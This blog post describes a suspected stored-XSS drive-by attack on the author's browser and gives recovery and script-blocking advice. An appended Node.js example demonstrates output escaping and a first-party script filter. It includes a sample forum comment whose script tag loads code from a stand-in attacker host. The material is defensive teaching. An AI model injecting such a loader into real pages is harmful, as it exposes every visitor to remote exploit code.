Getting Pwnd by a Chinese 0day

While it is bound to happen to everyone, having your computer compromised is never fun. I recently had this happen to me, and wanted to share some tips on how/why it happened, how to protect yourself, and how to recover from such an event.

How It Happened

In this case, I was looking up information on Google about making a rar file from a Linux command line, at a certain size. I Googled the answer as everyone does, and clicked on the first result. That link led me to a forum where someone else had the same question. Not locating my answer, I hit back and clicked on the second result, an ‘answers’ type website (similar to a blog/forum). Still no good answer, I clicked back. KABOOOOM. Now keep in mind I use Google Chrome, which automatically updates itself, and notifies you about/blocks plug-ins which are out of date (ref). This means the attacker used an 0day.

0day

An 0day is hacker lingo for a vulnerability (and the exploit written for it) that is being used in the wild, on the Internet, before the vendor knows about it. As such there is no patch, and the usual advice of "keep everything updated" cannot help you against that particular bug. Antivirus? Signature-based scanners only catch what they have already seen, so against a brand-new exploit they are close to worthless. What you can still do is shrink the attack surface the exploit needs in order to reach you, which is what the Prevention section below is about.

What Actually Happened

I have not had the time to safely retrace my steps and analyze the source code, so this portion is an assumption, but the general principles still hold true. This attack was more than likely not targeted, and involved not only a cross-site scripting (XSS) vulnerability but also a buffer overflow. The cross-site scripting portion of the attack was placed on either the blog or the forum. Both are highly likely since, by their very nature, they allow users to submit content to the site, and this user’s intent was malicious. The malicious user posted a reply/comment which included code that then gets executed in the web browser of anyone who visits the page; this is known as stored (or persistent) XSS, and in this case the browser it ran in was mine. Keep in mind that being able to post code to someone‘s blog/forum which the site then renders as live markup is a vulnerability and unexpected behavior: the site should have encoded the comment so it could only ever be displayed as text. From the point of my browser executing the code (often only one line), it more than likely went on to load additional code from another website, one owned or controlled by the malicious user who wants control of my computer. That additional code is what carries the actual exploit for a flaw in Google Chrome; splitting the attack this way lets the attacker swap the exploit at will without touching the forum post. Fortunately for me, the error box I saw means the exploit was more than likely not successful. Better safe than sorry though!

How to Protect Yourself

At this point we have to make a few assumptions: anything you do on your computer is being watched/recorded/monitored by the attacker, and ALL of your files are being stolen (exfiltrated) by the attacker. Screwed? Not entirely, but it is time to be very cautious.

  • Unplug from the network/Internet. This is definitely step 1. If you are not online, the attacker can no longer get your files or monitor you, and any malware on the machine cannot fetch further instructions.
  • Second, we need to get your files off the computer, since we will have to rebuild it from scratch. To do this, we will more than likely need to plug it back into the network.
    • To do so safely, download a bootable ISO (BackTrack, Ubuntu, Fedora) on a different, clean computer, check it against the published checksum, and boot the compromised machine from it. Booting from the ISO means the compromised operating system on the hard drive never runs, so the attacker’s software cannot reconnect. Now back your files up to a different computer.
    • Copy only data (documents, photos, source code). Do not carry executables, installers or browser profiles over to the clean machine, and if a file you keep can carry code (an office document with macros, for example), scan it before opening it on the new system.
  • Once that is done, it is time to wipe your computer and reinstall your operating system and all of your software, from original media or the vendor’s download site. Big pain in the butt? Definitely. But having your identity or credit cards stolen is much worse!
  • Since everything typed on the compromised machine may have been recorded, change your passwords from the clean machine, starting with e-mail and banking.

Prevention

So, how can we stop this from happening? First, keep in mind we are dealing with an 0day, so there is no patch available. For an XSS-based attack, we need to prevent scripts from running, especially ones from untrusted websites: the forum post can only hurt you if your browser executes the script it carries, and that script can only fetch the real exploit if your browser is willing to load code from the attacker’s site. To accomplish this in Mozilla Firefox, simply use NoScript. In Google Chrome, you need to dig into the options. Click the wrench icon in the top right corner. Select Preferences > Under The Hood > Under Privacy, click Content Settings…, select JavaScript. You can now set your options. Disabling all JavaScript may make certain websites (almost all) look funny/different. You will have to allow sites to run some JavaScript, but the key is to only run JavaScript for the page you are going to. For example, if you go to www.myfavoritesite.com, NoScript may tell you that three different sites want to run JavaScript: myfavoritesite.com, aMALICIOUSsite.com, and googleTracker.com. In this case you would only want to run myfavoritesite.com since that is the page you are at. Two caveats: once you allow a site, a stored XSS post on that site runs with the same permission, so keep the allow list short; and script blocking narrows the attack surface but does not remove it, since a browser can also be exploited through content that needs no script at all, such as a malformed image, font or plug-in file.
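Both mechanisms this post relies on, written out as one runnable Node.js example. This is added here and is not code from the original post: the first half shows the stored XSS comment described under "What Actually Happened" next to the output encoding that stops it, the second half shows the "only run scripts for the page you are at" decision from the paragraph above applied to a constructed page. The page markup, script paths and the hosts (www.myfavoritesite.com, aMALICIOUSsite.com and googleTracker.com, taken from the post's own example) are assumptions for illustration only.

```javascript
// Added example, not code from the original post. Two things from the text:
//   1. how a stored XSS comment becomes a one-line loader for attacker-hosted
//      script, and the output-encoding fix that neutralises it;
//   2. the "first-party only" script decision NoScript makes, applied to a page.
// All markup, paths and hosts below are constructed for illustration.

// --- 1. stored XSS: vulnerable render beside the hardened one ---------------

// What a malicious user submits as a forum reply. The payload is a single
// line whose only job is to fetch more code from a server the attacker runs.
const maliciousComment =
  'Try rar a -v100m out.rar dir/<script src="http://aMALICIOUSsite.com/x.js"></script>';

// Vulnerable: the stored comment is concatenated straight into the page HTML,
// so the <script> element is real markup and every visitor's browser runs it.
function renderCommentUnsafe(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Fix: encode the characters that can change the HTML context before the text
// is placed in the page. The comment still displays verbatim but is only text.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Rough model of what a browser does with rendered HTML: list every external
// script it would be asked to load. Real parsers do far more; this is enough
// to show the difference between the two renders.
function externalScriptSources(html) {
  const sources = [];
  const re = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) sources.push(m[1]);
  return sources;
}

// --- 2. first-party-only script policy ------------------------------------

const pageUrl = 'https://www.myfavoritesite.com/forum/thread/42';

// Constructed page: two first-party scripts (a relative path and a subdomain),
// a tracker, and the unsafe render of the comment above.
const pageHtml = `<html><head>
<script src="/static/app.js"></script>
<script src="//cdn.myfavoritesite.com/lib.js"></script>
<script src="https://googleTracker.com/tracker.js"></script>
</head><body>${renderCommentUnsafe(maliciousComment)}
<script>/* inline script belongs to the page itself */</script>
</body></html>`;

// Registrable domain as the last two labels. Deliberate simplification: a real
// implementation consults the Public Suffix List so example.co.uk is not co.uk.
function registrableDomain(hostname) {
  return hostname.toLowerCase().split('.').slice(-2).join('.');
}

// Resolve each src against the page URL (relative and protocol-relative paths
// included) and split the scripts into the ones a first-party-only policy
// would run and the ones it would block. URL lowercases hostnames for us.
function classifyScripts(html, page) {
  const pageDomain = registrableDomain(new URL(page).hostname);
  const allowed = [];
  const blocked = [];
  for (const src of externalScriptSources(html)) {
    const host = new URL(src, page).hostname;
    (registrableDomain(host) === pageDomain ? allowed : blocked).push(host);
  }
  return { allowed, blocked };
}

console.log(externalScriptSources(renderCommentUnsafe(maliciousComment))); // [ 'http://aMALICIOUSsite.com/x.js' ]
console.log(externalScriptSources(renderCommentSafe(maliciousComment)));   // []
const verdict = classifyScripts(pageHtml, pageUrl);
console.log(verdict.allowed); // [ 'www.myfavoritesite.com', 'cdn.myfavoritesite.com' ]
console.log(verdict.blocked); // [ 'googletracker.com', 'amalicioussite.com' ]
```

Run it with `node` to see both halves: the unsafe render hands the browser a script URL on the attacker's host, the escaped render hands it nothing, and the policy check runs only the two myfavoritesite.com scripts while blocking the tracker and the injected loader. The same classifier shows the caveat from the paragraph above: the injected script is blocked here only because it is hosted elsewhere; had the attacker uploaded x.js to the forum itself, a first-party-only rule would have let it through.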
